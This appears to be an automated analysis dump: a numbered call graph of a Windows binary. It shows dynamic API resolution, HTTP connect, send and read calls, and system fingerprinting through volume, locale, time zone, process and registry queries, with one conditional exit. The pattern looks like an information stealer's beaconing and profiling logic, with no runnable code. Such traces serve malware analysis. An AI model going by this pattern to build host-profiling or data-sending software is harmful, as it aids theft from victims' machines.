67831->67832 67833 404610 34 API calls 67832->67833 67834 403dc5 67833->67834 67835 404610 34 API calls 67834->67835 67836 403dde 67835->67836 67837 404610 34 API calls 67836->67837 67838 403df7 67837->67838 67839 404610 34 API calls 67838->67839 67840 403e10 67839->67840 67841 404610 34 API calls 67840->67841 67842 403e29 67841->67842 67843 404610 34 API calls 67842->67843 67844 403e42 67843->67844 67845 404610 34 API calls 67844->67845 67846 403e5b 67845->67846 67847 404610 34 API calls 67846->67847 67848 403e74 67847->67848 67849 404610 34 API calls 67848->67849 67850 403e8d 67849->67850 67851 404610 34 API calls 67850->67851 67852 403ea6 67851->67852 67853 404610 34 API calls 67852->67853 67854 403ebf 67853->67854 67855 404610 34 API calls 67854->67855 67856 403ed8 67855->67856 67857 404610 34 API calls 67856->67857 67858 403ef1 67857->67858 67859 404610 34 API calls 67858->67859 67860 403f0a 67859->67860 67861 404610 34 API calls 67860->67861 67862 403f23 67861->67862 67863 404610 34 API calls 67862->67863 67864 403f3c 67863->67864 67865 404610 34 API calls 67864->67865 67866 403f55 67865->67866 67867 404610 34 API calls 67866->67867 67868 403f6e 67867->67868 67869 404610 34 API calls 67868->67869 67870 403f87 67869->67870 67871 404610 34 API calls 67870->67871 67872 403fa0 67871->67872 67873 404610 34 API calls 67872->67873 67874 403fb9 67873->67874 67875 404610 34 API calls 67874->67875 67876 403fd2 67875->67876 67877 404610 34 API calls 67876->67877 67878 403feb 67877->67878 67879 404610 34 API calls 67878->67879 67880 404004 67879->67880 67881 404610 34 API calls 67880->67881 67882 40401d 67881->67882 67883 404610 34 API calls 67882->67883 67884 404036 67883->67884 67885 404610 34 API calls 67884->67885 67886 40404f 67885->67886 67887 404610 34 API calls 67886->67887 67888 404068 67887->67888 67889 404610 34 API calls 67888->67889 67890 404081 67889->67890 67891 404610 34 API calls 67890->67891 67892 40409a 67891->67892 67893 404610 34 API calls 67892->67893 67894 4040b3 67893->67894 67895 404610 34 API calls 67894->67895 67896 4040cc 67895->67896 67897 404610 34 API calls 67896->67897 67898 4040e5 67897->67898 67899 404610 34 API calls 67898->67899 67900 4040fe 67899->67900 67901 404610 34 API calls 67900->67901 67902 404117 67901->67902 67903 404610 34 API calls 67902->67903 67904 404130 67903->67904 67905 404610 34 API calls 67904->67905 67906 404149 67905->67906 67907 404610 34 API calls 67906->67907 67908 404162 67907->67908 67909 404610 34 API calls 67908->67909 67910 40417b 67909->67910 67911 404610 34 API calls 67910->67911 67912 404194 67911->67912 67913 404610 34 API calls 67912->67913 67914 4041ad 67913->67914 67915 404610 34 API calls 67914->67915 67916 4041c6 67915->67916 67917 404610 34 API calls 67916->67917 67918 4041df 67917->67918 67919 404610 34 API calls 67918->67919 67920 4041f8 67919->67920 67921 404610 34 API calls 67920->67921 67922 404211 67921->67922 67923 404610 34 API calls 67922->67923 67924 40422a 67923->67924 67925 404610 34 API calls 67924->67925 67926 404243 67925->67926 67927 404610 34 API calls 67926->67927 67928 40425c 67927->67928 67929 404610 34 API calls 67928->67929 67930 404275 67929->67930 67931 404610 34 API calls 67930->67931 67932 40428e 67931->67932 67933 404610 34 API calls 67932->67933 67934 4042a7 67933->67934 67935 404610 34 API calls 67934->67935 67936 4042c0 67935->67936 67937 404610 34 API calls 67936->67937 67938 4042d9 67937->67938 67939 404610 34 API calls 67938->67939 67940 4042f2 67939->67940 67941 404610 34 API calls 67940->67941 67942 40430b 67941->67942 67943 404610 34 API calls 67942->67943 67944 404324 67943->67944 67945 404610 34 API calls 67944->67945 67946 40433d 67945->67946 67947 404610 34 API calls 67946->67947 67948 404356 67947->67948 67949 404610 34 API calls 67948->67949 67950 40436f 67949->67950 67951 404610 34 API calls 67950->67951 67952 404388 67951->67952 67953 404610 34 API calls 67952->67953 67954 4043a1 67953->67954 67955 404610 34 API calls 67954->67955 67956 4043ba 67955->67956 67957 404610 34 API calls 67956->67957 67958 4043d3 67957->67958 67959 404610 34 API calls 67958->67959 67960 4043ec 67959->67960 67961 404610 34 API calls 67960->67961 67962 404405 67961->67962 67963 404610 34 API calls 67962->67963 67964 40441e 67963->67964 67965 404610 34 API calls 67964->67965 67966 404437 67965->67966 67967 404610 34 API calls 67966->67967 67968 404450 67967->67968 67969 404610 34 API calls 67968->67969 67970 404469 67969->67970 67971 404610 34 API calls 67970->67971 67972 404482 67971->67972 67973 404610 34 API calls 67972->67973 67974 40449b 67973->67974 67975 404610 34 API calls 67974->67975 67976 4044b4 67975->67976 67977 404610 34 API calls 67976->67977 67978 4044cd 67977->67978 67979 404610 34 API calls 67978->67979 67980 4044e6 67979->67980 67981 404610 34 API calls 67980->67981 67982 4044ff 67981->67982 67983 404610 34 API calls 67982->67983 67984 404518 67983->67984 67985 404610 34 API calls 67984->67985 67986 404531 67985->67986 67987 404610 34 API calls 67986->67987 67988 40454a 67987->67988 67989 404610 34 API calls 67988->67989 67990 404563 67989->67990 67991 404610 34 API calls 67990->67991 67992 40457c 67991->67992 67993 404610 34 API calls 67992->67993 67994 404595 67993->67994 67995 404610 34 API calls 67994->67995 67996 4045ae 67995->67996 67997 404610 34 API calls 67996->67997 67998 4045c7 67997->67998 67999 404610 34 API calls 67998->67999 68000 4045e0 67999->68000 68001 404610 34 API calls 68000->68001 68002 4045f9 68001->68002 68003 4195e0 68002->68003 68004 4195f0 43 API calls 68003->68004 68005 419a06 8 API calls 68003->68005 68004->68005 68006 419b16 68005->68006 68007 419a9c GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 68005->68007 68008 419b23 8 API calls 68006->68008 68009 419be6 68006->68009 68007->68006 68008->68009 68010 419c68 68009->68010 68011 419bef GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 68009->68011 68012 419c75 6 API calls 68010->68012 68013 419d07 68010->68013 68011->68010 68012->68013 68014 419d14 9 API calls 68013->68014 68015 419def 68013->68015 68014->68015 68016 419e72 68015->68016 68017 419df8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 68015->68017 68018 419e7b GetProcAddress GetProcAddress 68016->68018 68019 419eac 68016->68019 68017->68016 68018->68019 68020 419ee5 68019->68020 68021 419eb5 GetProcAddress GetProcAddress 68019->68021 68022 419fe2 68020->68022 68023 419ef2 10 API calls 68020->68023 68021->68020 68024 419feb GetProcAddress GetProcAddress GetProcAddress GetProcAddress 68022->68024 68025 41a04d 68022->68025 68023->68022 68024->68025 68026 41a056 GetProcAddress 68025->68026 68027 41a06e 68025->68027 68026->68027 68028 41a077 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 68027->68028 68029 415783 68027->68029 68028->68029 68030 401590 68029->68030 69080 4016b0 68030->69080 68033 41a170 lstrcpy 68034 4015b5 68033->68034 68035 41a170 lstrcpy 68034->68035 68036 4015c7 68035->68036 68037 41a170 lstrcpy 68036->68037 68038 4015d9 68037->68038 68039 41a170 lstrcpy 68038->68039 68040 401663 68039->68040 68041 414ff0 68040->68041 68042 415001 68041->68042 68043 41a1f0 2 API calls 68042->68043 68044 41500e 68043->68044 68045 41a1f0 2 API calls 68044->68045 68046 41501b 68045->68046 68047 41a1f0 2 API calls 68046->68047 68048 415028 68047->68048 68049 41a110 lstrcpy 68048->68049 68050 415035 68049->68050 68051 41a110 lstrcpy 68050->68051 68052 415042 68051->68052 68053 41a110 lstrcpy 68052->68053 68054 41504f 68053->68054 68055 41a110 lstrcpy 68054->68055 68068 41505c 68055->68068 68056 415123 StrCmpCA 68056->68068 68057 415180 StrCmpCA 68058 4152bc 68057->68058 68057->68068 68059 41a270 lstrcpy 68058->68059 68061 4152c8 68059->68061 68060 401590 lstrcpy 68060->68068 68062 41a1f0 2 API calls 68061->68062 68063 4152d6 68062->68063 68069 41a1f0 2 API calls 68063->68069 68064 415336 StrCmpCA 68065 415471 68064->68065 68064->68068 68070 41a270 lstrcpy 68065->68070 68066 41a110 lstrcpy 68066->68068 68067 41a170 lstrcpy 68067->68068 68068->68056 68068->68057 68068->68060 68068->68064 68068->68066 68068->68067 68074 41a1f0 lstrlenA lstrcpy 68068->68074 68076 4154eb StrCmpCA 68068->68076 68077 414cd0 23 API calls 68068->68077 68088 414da0 29 API calls 68068->68088 68091 41a270 lstrcpy 68068->68091 68092 41526a StrCmpCA 68068->68092 68095 41541f StrCmpCA 68068->68095 68071 4152e5 68069->68071 68072 41547d 68070->68072 68073 4016b0 lstrcpy 68071->68073 68075 41a1f0 2 API calls 68072->68075 68094 4152f1 68073->68094 68074->68068 68078 41548b 68075->68078 68079 4154f6 Sleep 68076->68079 68080 415508 68076->68080 68077->68068 68081 41a1f0 2 API calls 68078->68081 68079->68068 68082 41a270 lstrcpy 68080->68082 68083 41549a 68081->68083 68085 415514 68082->68085 68084 4016b0 lstrcpy 68083->68084 68084->68094 68086 41a1f0 2 API calls 68085->68086 68087 415523 68086->68087 68089 41a1f0 2 API calls 68087->68089 68088->68068 68090 415532 68089->68090 68093 4016b0 lstrcpy 68090->68093 68091->68068 68092->68068 68093->68094 68094->67148 68095->68068 68097 416ff3 GetVolumeInformationA 68096->68097 68098 416fec 68096->68098 68100 417031 68097->68100 68098->68097 68099 41709c GetProcessHeap HeapAlloc 68101 4170b9 68099->68101 68102 4170c8 wsprintfA 68099->68102 68100->68099 68104 41a110 lstrcpy 68101->68104 68103 41a110 lstrcpy 68102->68103 68105 415887 68103->68105 68104->68105 68105->67169 68107 41a170 lstrcpy 68106->68107 68108 4048e9 68107->68108 69089 404800 68108->69089 68110 4048f5 68111 41a110 lstrcpy 68110->68111 68112 404927 68111->68112 68113 41a110 lstrcpy 68112->68113 68114 404934 68113->68114 68115 41a110 lstrcpy 68114->68115 68116 404941 68115->68116 68117 41a110 lstrcpy 68116->68117 68118 40494e 68117->68118 68119 41a110 lstrcpy 68118->68119 68120 40495b InternetOpenA StrCmpCA 68119->68120 68121 404994 68120->68121 68122 4049a5 68121->68122 68123 404f1b InternetCloseHandle 68121->68123 69102 418600 68122->69102 68125 404f38 68123->68125 69097 409b10 CryptStringToBinaryA 68125->69097 68126 4049b3 69110 41a2f0 68126->69110 68129 4049c6 68131 41a270 lstrcpy 68129->68131 68136 4049cf 68131->68136 68132 41a1f0 2 API calls 68133 404f55 68132->68133 68135 41a380 4 API calls 68133->68135 68134 404f77 ctype 68138 41a170 lstrcpy 68134->68138 68137 404f6b 68135->68137 68140 41a380 4 API calls 68136->68140 68139 41a270 lstrcpy 68137->68139 68151 404fa7 68138->68151 68139->68134 68141 4049f9 68140->68141 68142 41a270 lstrcpy 68141->68142 68143 404a02 68142->68143 68144 41a380 4 API calls 68143->68144 68145 404a21 68144->68145 68146 41a270 lstrcpy 68145->68146 68147 404a2a 68146->68147 68148 41a2f0 3 API calls 68147->68148 68149 404a48 68148->68149 68150 41a270 lstrcpy 68149->68150 68152 404a51 68150->68152 68151->67172 68153 41a380 4 API calls 68152->68153 68154 404a70 68153->68154 68155 41a270 lstrcpy 68154->68155 68156 404a79 68155->68156 68157 41a380 4 API calls 68156->68157 68158 404a98 68157->68158 68159 41a270 lstrcpy 68158->68159 68160 404aa1 68159->68160 68161 41a380 4 API calls 68160->68161 68162 404acd 68161->68162 68163 41a2f0 3 API calls 68162->68163 68164 404ad4 68163->68164 68165 41a270 lstrcpy 68164->68165 68166 404add 68165->68166 68167 404af3 InternetConnectA 68166->68167 68167->68123 68168 404b23 HttpOpenRequestA 68167->68168 68170 404b78 68168->68170 68171 404f0e InternetCloseHandle 68168->68171 68172 41a380 4 API calls 68170->68172 68171->68123 68173 404b8c 68172->68173 68174 41a270 lstrcpy 68173->68174 68175 404b95 68174->68175 68176 41a2f0 3 API calls 68175->68176 68177 404bb3 68176->68177 68178 41a270 lstrcpy 68177->68178 68179 404bbc 68178->68179 68180 41a380 4 API calls 68179->68180 68181 404bdb 68180->68181 68182 41a270 lstrcpy 68181->68182 68183 404be4 68182->68183 68184 41a380 4 API calls 68183->68184 68185 404c05 68184->68185 68186 41a270 lstrcpy 68185->68186 68187 404c0e 68186->68187 68188 41a380 4 API calls 68187->68188 68189 404c2e 68188->68189 68190 41a270 lstrcpy 68189->68190 68191 404c37 68190->68191 68192 41a380 4 API calls 68191->68192 68193 404c56 68192->68193 68194 41a270 lstrcpy 68193->68194 68195 404c5f 68194->68195 68196 41a2f0 3 API calls 68195->68196 68197 404c7d 68196->68197 68198 41a270 lstrcpy 68197->68198 68199 404c86 68198->68199 68200 41a380 4 API calls 68199->68200 68201 404ca5 68200->68201 68202 41a270 lstrcpy 68201->68202 68203 404cae 68202->68203 68204 41a380 4 API calls 68203->68204 68205 404ccd 68204->68205 68206 41a270 lstrcpy 68205->68206 68207 404cd6 68206->68207 68208 41a2f0 3 API calls 68207->68208 68209 404cf4 68208->68209 68210 41a270 lstrcpy 68209->68210 68211 404cfd 68210->68211 68212 41a380 4 API calls 68211->68212 68213 404d1c 68212->68213 68214 41a270 lstrcpy 68213->68214 68215 404d25 68214->68215 68216 41a380 4 API calls 68215->68216 68217 404d46 68216->68217 68218 41a270 lstrcpy 68217->68218 68219 404d4f 68218->68219 68220 41a380 4 API calls 68219->68220 68221 404d6f 68220->68221 68222 41a270 lstrcpy 68221->68222 68223 404d78 68222->68223 68224 41a380 4 API calls 68223->68224 68225 404d97 68224->68225 68226 41a270 lstrcpy 68225->68226 68227 404da0 68226->68227 68228 41a2f0 3 API calls 68227->68228 68229 404dbe 68228->68229 68230 41a270 lstrcpy 68229->68230 68231 404dc7 68230->68231 68232 41a110 lstrcpy 68231->68232 68233 404de2 68232->68233 68234 41a2f0 3 API calls 68233->68234 68235 404e03 68234->68235 68236 41a2f0 3 API calls 68235->68236 68237 404e0a 68236->68237 68238 41a270 lstrcpy 68237->68238 68239 404e16 68238->68239 68240 404e37 lstrlenA 68239->68240 68241 404e4a 68240->68241 68242 404e53 lstrlenA 68241->68242 69116 41a4a0 68242->69116 68244 404e63 HttpSendRequestA 68245 404e82 InternetReadFile 68244->68245 68246 404eb7 InternetCloseHandle 68245->68246 68251 404eae 68245->68251 68248 41a1d0 68246->68248 68248->68171 68249 41a380 4 API calls 68249->68251 68250 41a270 lstrcpy 68250->68251 68251->68245 68251->68246 68251->68249 68251->68250 69121 41a4a0 68252->69121 68254 4112d4 StrCmpCA 68255 4112e7 68254->68255 68256 4112df ExitProcess 68254->68256 68257 4112f7 strtok_s 68255->68257 68271 411304 68257->68271 68258 4114d2 68258->67174 68259 4114ae strtok_s 68259->68271 68260 411401 StrCmpCA 68260->68271 68261 411461 StrCmpCA 68261->68271 68262 411480 StrCmpCA 68262->68271 68263 411423 StrCmpCA 68263->68271 68264 411442 StrCmpCA 68264->68271 68265 41136d StrCmpCA 68265->68271 68266 41138f StrCmpCA 68266->68271 68267 4113bd StrCmpCA 68267->68271 68268 4113df StrCmpCA 68268->68271 68269 41a1f0 lstrlenA lstrcpy 68269->68271 68270 41a1f0 2 API calls 68270->68259 68271->68258 68271->68259 68271->68260 68271->68261 68271->68262 68271->68263 68271->68264 68271->68265 68271->68266 68271->68267 68271->68268 68271->68269 68271->68270 68273 41a170 lstrcpy 68272->68273 68274 4059c9 68273->68274 68275 404800 5 API calls 68274->68275 68276 4059d5 68275->68276 68277 41a110 lstrcpy 68276->68277 68278 405a0a 68277->68278 68279 41a110 lstrcpy 68278->68279 68280 405a17 68279->68280 68281 41a110 lstrcpy 68280->68281 68282 405a24 68281->68282 68283 41a110 lstrcpy 68282->68283 68284 405a31 68283->68284 68285 41a110 lstrcpy 68284->68285 68286 405a3e InternetOpenA StrCmpCA 68285->68286 68287 405a6d 68286->68287 68288 406013 InternetCloseHandle 68287->68288 68290 418600 3 API calls 68287->68290 68289 406030 68288->68289 68292 409b10 4 API calls 68289->68292 68291 405a8c 68290->68291 68293 41a2f0 3 API calls 68291->68293 68294 406036 68292->68294 68295 405a9f 68293->68295 68297 41a1f0 2 API calls 68294->68297 68300 40606f ctype 68294->68300 68296 41a270 lstrcpy 68295->68296 68302 405aa8 68296->68302 68298 40604d 68297->68298 68299 41a380 4 API calls 68298->68299 68301 406063 68299->68301 68304 41a170 lstrcpy 68300->68304 68303 41a270 lstrcpy 68301->68303 68305 41a380 4 API calls 68302->68305 68303->68300 68314 40609f 68304->68314 68306 405ad2 68305->68306 68307 41a270 lstrcpy 68306->68307 68308 405adb 68307->68308 68309 41a380 4 API calls 68308->68309 68310 405afa 68309->68310 68311 41a270 lstrcpy 68310->68311 68312 405b03 68311->68312 68313 41a2f0 3 API calls 68312->68313 68315 405b21 68313->68315 68314->67180 68316 41a270 lstrcpy 68315->68316 68317 405b2a 68316->68317 68318 41a380 4 API calls 68317->68318 68319 405b49 68318->68319 68320 41a270 lstrcpy 68319->68320 68321 405b52 68320->68321 68322 41a380 4 API calls 68321->68322 68323 405b71 68322->68323 68324 41a270 lstrcpy 68323->68324 68325 405b7a 68324->68325 68326 41a380 4 API calls 68325->68326 68327 405ba6 68326->68327 68328 41a2f0 3 API calls 68327->68328 68329 405bad 68328->68329 68330 41a270 lstrcpy 68329->68330 68331 405bb6 68330->68331 68332 405bcc InternetConnectA 68331->68332 68332->68288 68333 405bfc HttpOpenRequestA 68332->68333 68335 406006 InternetCloseHandle 68333->68335 68336 405c5b 68333->68336 68335->68288 68337 41a380 4 API calls 68336->68337 68338 405c6f 68337->68338 68339 41a270 lstrcpy 68338->68339 68340 405c78 68339->68340 68341 41a2f0 3 API calls 68340->68341 68342 405c96 68341->68342 68343 41a270 lstrcpy 68342->68343 68344 405c9f 68343->68344 68345 41a380 4 API calls 68344->68345 68346 405cbe 68345->68346 68347 41a270 lstrcpy 68346->68347 68348 405cc7 68347->68348 68349 41a380 4 API calls 68348->68349 68350 405ce8 68349->68350 68351 41a270 lstrcpy 68350->68351 68352 405cf1 68351->68352 68353 41a380 4 API calls 68352->68353 68354 405d11 68353->68354 68355 41a270 lstrcpy 68354->68355 68356 405d1a 68355->68356 68357 41a380 4 API calls 68356->68357 68358 405d39 68357->68358 68359 41a270 lstrcpy 68358->68359 68360 405d42 68359->68360 68361 41a2f0 3 API calls 68360->68361 68362 405d60 68361->68362 68363 41a270 lstrcpy 68362->68363 68364 405d69 68363->68364 68365 41a380 4 API calls 68364->68365 68366 405d88 68365->68366 68367 41a270 lstrcpy 68366->68367 68368 405d91 68367->68368 68369 41a380 4 API calls 68368->68369 68370 405db0 68369->68370 68371 41a270 lstrcpy 68370->68371 68372 405db9 68371->68372 68373 41a2f0 3 API calls 68372->68373 68374 405dd7 68373->68374 68375 41a270 lstrcpy 68374->68375 68376 405de0 68375->68376 68377 41a380 4 API calls 68376->68377 68378 405dff 68377->68378 68379 41a270 lstrcpy 68378->68379 68380 405e08 68379->68380 68381 41a380 4 API calls 68380->68381 68382 405e29 68381->68382 68383 41a270 lstrcpy 68382->68383 68384 405e32 68383->68384 68385 41a380 4 API calls 68384->68385 68386 405e52 68385->68386 68387 41a270 lstrcpy 68386->68387 68388 405e5b 68387->68388 68389 41a380 4 API calls 68388->68389 68390 405e7a 68389->68390 68391 41a270 lstrcpy 68390->68391 68392 405e83 68391->68392 68393 41a2f0 3 API calls 68392->68393 68394 405ea4 68393->68394 68395 41a270 lstrcpy 68394->68395 68396 405ead 68395->68396 68397 405ec0 lstrlenA 68396->68397 69122 41a4a0 68397->69122 68399 405ed1 lstrlenA GetProcessHeap HeapAlloc 69123 41a4a0 68399->69123 68401 405efe lstrlenA 69124 41a4a0 68401->69124 68403 405f0e memcpy 69125 41a4a0 68403->69125 68405 405f27 lstrlenA 68406 405f37 68405->68406 68407 405f40 lstrlenA memcpy 68406->68407 69126 41a4a0 68407->69126 68409 405f6a lstrlenA 69127 41a4a0 68409->69127 68411 405f7a HttpSendRequestA 68412 405f85 InternetReadFile 68411->68412 68413 405fba InternetCloseHandle 68412->68413 68417 405fb1 68412->68417 68413->68335 68415 41a380 4 API calls 68415->68417 68416 41a270 lstrcpy 68416->68417 68417->68412 68417->68413 68417->68415 68417->68416 69128 41a4a0 68418->69128 68420 410b87 strtok_s 68423 410b94 68420->68423 68421 410c61 68421->67182 68422 410c3d strtok_s 68422->68423 68423->68421 68423->68422 68424 41a1f0 lstrlenA lstrcpy 68423->68424 68424->68423 69129 41a4a0 68425->69129 68427 4108c7 strtok_s 68430 4108d4 68427->68430 68428 410a27 68428->67190 68429 410a03 strtok_s 68429->68430 68430->68428 68430->68429 68431 4109b4 StrCmpCA 68430->68431 68432 410937 StrCmpCA 68430->68432 68433 410977 StrCmpCA 68430->68433 68434 41a1f0 lstrlenA lstrcpy 68430->68434 68431->68430 68432->68430 68433->68430 68434->68430 69130 41a4a0 68435->69130 68437 410a77 strtok_s 68440 410a84 68437->68440 68438 410b54 68438->67198 68439 410ac2 StrCmpCA 68439->68440 68440->68438 68440->68439 68441 410b30 strtok_s 68440->68441 68442 41a1f0 lstrlenA lstrcpy 68440->68442 68441->68440 68442->68440 68444 41a110 lstrcpy 68443->68444 68445 411536 68444->68445 68446 41a380 4 API calls 68445->68446 68447 411547 68446->68447 68448 41a270 lstrcpy 68447->68448 68449 411550 68448->68449 68450 41a380 4 API calls 68449->68450 68451 41156b 68450->68451 68452 41a270 lstrcpy 68451->68452 68453 411574 68452->68453 68454 41a380 4 API calls 68453->68454 68455 41158d 68454->68455 68456 41a270 lstrcpy 68455->68456 68457 411596 68456->68457 68458 41a380 4 API calls 68457->68458 68459 4115b1 68458->68459 68460 41a270 lstrcpy 68459->68460 68461 4115ba 68460->68461 68462 41a380 4 API calls 68461->68462 68463 4115d3 68462->68463 68464 41a270 lstrcpy 68463->68464 68465 4115dc 68464->68465 68466 41a380 4 API calls 68465->68466 68467 4115f7 68466->68467 68468 41a270 lstrcpy 68467->68468 68469 411600 68468->68469 68470 41a380 4 API calls 68469->68470 68471 411619 68470->68471 68472 41a270 lstrcpy 68471->68472 68473 411622 68472->68473 68474 41a380 4 API calls 68473->68474 68475 41163d 68474->68475 68476 41a270 lstrcpy 68475->68476 68477 411646 68476->68477 68478 41a380 4 API calls 68477->68478 68479 41165f 68478->68479 68480 41a270 lstrcpy 68479->68480 68481 411668 68480->68481 68482 41a380 4 API calls 68481->68482 68483 411686 68482->68483 68484 41a270 lstrcpy 68483->68484 68485 41168f 68484->68485 68486 416fa0 6 API calls 68485->68486 68487 4116a6 68486->68487 68488 41a2f0 3 API calls 68487->68488 68489 4116b9 68488->68489 68490 41a270 lstrcpy 68489->68490 68491 4116c2 68490->68491 68492 41a380 4 API calls 68491->68492 68493 4116ec 68492->68493 68494 41a270 lstrcpy 68493->68494 68495 4116f5 68494->68495 68496 41a380 4 API calls 68495->68496 68497 411715 68496->68497 68498 41a270 lstrcpy 68497->68498 68499 41171e 68498->68499 69131 417130 GetProcessHeap HeapAlloc 68499->69131 68502 41a380 4 API calls 68503 41173e 68502->68503 68504 41a270 lstrcpy 68503->68504 68505 411747 68504->68505 68506 41a380 4 API calls 68505->68506 68507 411766 68506->68507 68508 41a270 lstrcpy 68507->68508 68509 41176f 68508->68509 68510 41a380 4 API calls 68509->68510 68511 411790 68510->68511 68512 41a270 lstrcpy 68511->68512 68513 411799 68512->68513 69138 417260 GetCurrentProcess IsWow64Process 68513->69138 68516 41a380 4 API calls 68517 4117b9 68516->68517 68518 41a270 lstrcpy 68517->68518 68519 4117c2 68518->68519 68520 41a380 4 API calls 68519->68520 68521 4117e1 68520->68521 68522 41a270 lstrcpy 68521->68522 68523 4117ea 68522->68523 68524 41a380 4 API calls 68523->68524 68525 41180b 68524->68525 68526 41a270 lstrcpy 68525->68526 68527 411814 68526->68527 68528 4172f0 3 API calls 68527->68528 68529 411824 68528->68529 68530 41a380 4 API calls 68529->68530 68531 411834 68530->68531 68532 41a270 lstrcpy 68531->68532 68533 41183d 68532->68533 68534 41a380 4 API calls 68533->68534 68535 41185c 68534->68535 68536 41a270 lstrcpy 68535->68536 68537 411865 68536->68537 68538 41a380 4 API calls 68537->68538 68539 411885 68538->68539 68540 41a270 lstrcpy 68539->68540 68541 41188e 68540->68541 68542 417380 3 API calls 68541->68542 68543 41189e 68542->68543 68544 41a380 4 API calls 68543->68544 68545 4118ae 68544->68545 68546 41a270 lstrcpy 68545->68546 68547 4118b7 68546->68547 68548 41a380 4 API calls 68547->68548 68549 4118d6 68548->68549 68550 41a270 lstrcpy 68549->68550 68551 4118df 68550->68551 68552 41a380 4 API calls 68551->68552 68553 411900 68552->68553 68554 41a270 lstrcpy 68553->68554 68555 411909 68554->68555 69140 417420 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 68555->69140 68558 41a380 4 API calls 68559 411929 68558->68559 68560 41a270 lstrcpy 68559->68560 68561 411932 68560->68561 68562 41a380 4 API calls 68561->68562 68563 411951 68562->68563 68564 41a270 lstrcpy 68563->68564 68565 41195a 68564->68565 68566 41a380 4 API calls 68565->68566 68567 41197b 68566->68567 68568 41a270 lstrcpy 68567->68568 68569 411984 68568->68569 69142 4174d0 GetProcessHeap HeapAlloc GetTimeZoneInformation 68569->69142 68572 41a380 4 API calls 68573 4119a4 68572->68573 68574 41a270 lstrcpy 68573->68574 68575 4119ad 68574->68575 68576 41a380 4 API calls 68575->68576 68577 4119cc 68576->68577 68578 41a270 lstrcpy 68577->68578 68579 4119d5 68578->68579 68580 41a380 4 API calls 68579->68580 68581 4119f5 68580->68581 68582 41a270 lstrcpy 68581->68582 68583 4119fe 68582->68583 69145 4175a0 GetUserDefaultLocaleName 68583->69145 68586 41a380 4 API calls 68587 411a1e 68586->68587 68588 41a270 lstrcpy 68587->68588 68589 411a27 68588->68589 68590 41a380 4 API calls 68589->68590 68591 411a46 68590->68591 68592 41a270 lstrcpy 68591->68592 68593 411a4f 68592->68593 68594 41a380 4 API calls 68593->68594 68595 411a70 68594->68595 68596 41a270 lstrcpy 68595->68596 68597 411a79 68596->68597 69150 417630 68597->69150 68599 411a90 68600 41a2f0 3 API calls 68599->68600 68601 411aa3 68600->68601 68602 41a270 lstrcpy 68601->68602 68603 411aac 68602->68603 68604 41a380 4 API calls 68603->68604 68605 411ad6 68604->68605 68606 41a270 lstrcpy 68605->68606 68607 411adf 68606->68607 68608 41a380 4 API calls 68607->68608 68609 411aff 68608->68609 68610 41a270 lstrcpy 68609->68610 68611 411b08 68610->68611 69162 417820 GetSystemPowerStatus 68611->69162 68614 41a380 4 API calls 68615 411b28 68614->68615 68616 41a270 lstrcpy 68615->68616 68617 411b31 68616->68617 68618 41a380 4 API calls 68617->68618 68619 411b50 68618->68619 68620 41a270 lstrcpy 68619->68620 68621 411b59 68620->68621 68622 41a380 4 API calls 68621->68622 68623 411b7a 68622->68623 68624 41a270 lstrcpy 68623->68624 68625 411b83 68624->68625 68626 411b8e GetCurrentProcessId 68625->68626 69164 418f10 OpenProcess 68626->69164 68629 41a2f0 3 API calls 68630 411bb4 68629->68630 68631 41a270 lstrcpy 68630->68631 68632 411bbd 68631->68632 68633 41a380 4 API calls 68632->68633 68634 411be7 68633->68634 68635 41a270 lstrcpy 68634->68635 68636 411bf0 68635->68636 68637 41a380 4 API calls 68636->68637 68638 411c10 68637->68638 68639 41a270 lstrcpy 68638->68639 68640 411c19 68639->68640 69169 4178a0 GetProcessHeap HeapAlloc RegOpenKeyExA 68640->69169 68643 41a380 4 API calls 68644 411c39 68643->68644 68645 41a270 lstrcpy 68644->68645 68646 411c42 68645->68646 68647 41a380 4 API calls 68646->68647 68648 411c61 68647->68648 68649 41a270 lstrcpy 68648->68649 68650 411c6a 68649->68650 68651 41a380 4 API calls 68650->68651 68652 411c8b 68651->68652 68653 41a270 lstrcpy 68652->68653 68654 411c94 68653->68654 69173 417a00 68654->69173 68657 41a380 4 API calls 68658 411cb4 68657->68658 68659 41a270 lstrcpy 68658->68659 68660 411cbd 68659->68660 68661 41a380 4 API calls 68660->68661 68662 411cdc 68661->68662 68663 41a270 lstrcpy 68662->68663 68664 411ce5 68663->68664 68665 41a380 4 API calls 68664->68665 68666 411d06 68665->68666 68667 41a270 lstrcpy 68666->68667 68668 411d0f 68667->68668 69188 417970 GetSystemInfo wsprintfA 68668->69188 68671 41a380 4 API calls 68672 411d2f 68671->68672 68673 41a270 lstrcpy 68672->68673 68674 411d38 68673->68674 68675 41a380 4 API calls 68674->68675 68676 411d57 68675->68676 68677 41a270 lstrcpy 68676->68677 68678 411d60 68677->68678 68679 41a380 4 API calls 68678->68679 68680 411d80 68679->68680 68681 41a270 lstrcpy 68680->68681 68682 411d89 68681->68682 69190 417ba0 GetProcessHeap HeapAlloc 68682->69190 68685 41a380 4 API calls 68686 411da9 68685->68686 68687 41a270 lstrcpy 68686->68687 68688 411db2 68687->68688 68689 41a380 4 API calls 68688->68689 68690 411dd1 68689->68690 68691 41a270 lstrcpy 68690->68691 68692 411dda 68691->68692 68693 41a380 4 API calls 68692->68693 68694 411dfb 68693->68694 68695 41a270 lstrcpy 68694->68695 68696 411e04 68695->68696 69196 418260 68696->69196 68699 41a2f0 3 API calls 68700 411e2e 68699->68700 68701 41a270 lstrcpy 68700->68701 68702 411e37 68701->68702 68703 41a380 4 API calls 68702->68703 68704 411e61 68703->68704 68705 41a270 lstrcpy 68704->68705 68706 411e6a 68705->68706 68707 41a380 4 API calls 68706->68707 68708 411e8a 68707->68708 68709 41a270 lstrcpy 68708->68709 68710 411e93 68709->68710 68711 41a380 4 API calls 68710->68711 68712 411eb2 68711->68712 68713 41a270 lstrcpy 68712->68713 68714 411ebb 68713->68714 69201 417c90 68714->69201 68716 411ed2 68717 41a2f0 3 API calls 68716->68717 68718 411ee5 68717->68718 68719 41a270 lstrcpy 68718->68719 68720 411eee 68719->68720 68721 41a380 4 API calls 68720->68721 68722 411f1a 68721->68722 68723 41a270 lstrcpy 68722->68723 68724 411f23 68723->68724 68725 41a380 4 API calls 68724->68725 68726 411f42 68725->68726 68727 41a270 